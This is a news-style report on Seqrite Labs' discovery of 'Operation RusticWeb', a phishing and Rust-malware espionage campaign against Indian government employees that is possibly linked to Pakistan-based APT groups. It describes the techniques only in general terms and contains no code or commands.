Seqrite has discovered “Operation RusticWeb,” a highly advanced cyber-espionage effort that was painstakingly planned to target different Indian government employees. The experts at Seqrite Labs, the cybersecurity research and response branch of Quick Heal and the biggest malware detection facility in India have uncovered an unsettling shift in the strategies used by threat actors while analysing this cyber-espionage campaign.
Seqrite Labs’ APT Team has been carefully delving into the complexities of Operation RusticWeb since October 2023. They have discovered a multidimensional methodology that blends state-of-the-art methods with novel programming languages. The campaign uses encrypted PowerShell instructions and malware built on the Rust platform, indicating a deliberate shift in strategy toward more sophisticated and devious ways to obtain private information.
There is a phishing campaign directed at government employees. Threat actors have used hacked and fictitious domains to contain harmful payloads and bogus files. These payloads have included IPR forms and fictitious domains that imitate esteemed institutions such as the Army Welfare Education Society (AWES). Decoy files, which are used to trick people into clicking on malicious websites, contain presentations about Ministry of Defense projects and forms pertaining to the Defense Services Officers Provident Fund.
Rust-based payloads and encrypted PowerShell commands are used in Operation RusticWeb. By using a web-based service engine to exfiltrate confidential documents, the threat actors up the ante on their cyber-espionage strategies. Rust-based payloads played a major role in the initial infection chain that was seen; a malicious shortcut file started a complex chain of events that resulted in the exfiltration of private information. The second infection chain, which was discovered in December, demonstrated the adaptability and complexity of threat actors by employing encrypted PowerShell commands to deliver malicious documents.
Operation RusticWeb’s last payload is malware built on rust that steals data. This clever spyware ensures considerable reconnaissance capability by gathering system information in addition to stealing files. The threat actors bypass the traditional usage of specialized command-and-control servers by exfiltrating data using an anonymous public file-sharing engine called OshiUpload.
The operation serves as an excellent illustration of how threat actors are moving away from traditional cyberattack techniques and into more modern programming languages like Golang, Rust, and Nim, which offer cross-compatibility and make detection more challenging. The campaign highlights similarities with APT groups associated with Pakistan, namely Transparent Tribe (APT36) and SideCopy, suggesting the potential for a more extensive and well-planned cyber-espionage operation.
Seqrite stresses the need for strong cybersecurity measures and calls for increased prudence in the context of quickly changing cyberthreats. The firm is still dedicated to leading cybersecurity research and offering vital insights to protect people, businesses, and governments from ever-changing cyberthreats.